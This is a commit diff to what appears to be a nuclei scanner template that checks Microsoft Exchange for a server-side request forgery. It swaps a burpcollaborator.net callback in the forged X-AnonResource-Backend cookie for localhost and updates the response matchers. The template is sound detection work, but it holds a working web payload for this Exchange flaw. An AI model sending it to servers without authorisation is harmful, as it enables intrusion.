Merge pull request #1043 from al3xdelarge/master

No need for internet connection and leak to burp
patch-1
PD-Team 2021-03-08 13:44:02 +05:30 committed by GitHub
commit 1472968417
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions

View File

@ -19,7 +19,7 @@ requests:
GET /owa/auth/x.js HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close
@ -27,8 +27,8 @@ requests:
matchers:
- type: status
status:
- 200
- 500
- type: word
words:
- "Burp Collaborator Server"
part: body
- 'X-Calculatedbetarget: localhost'
part: header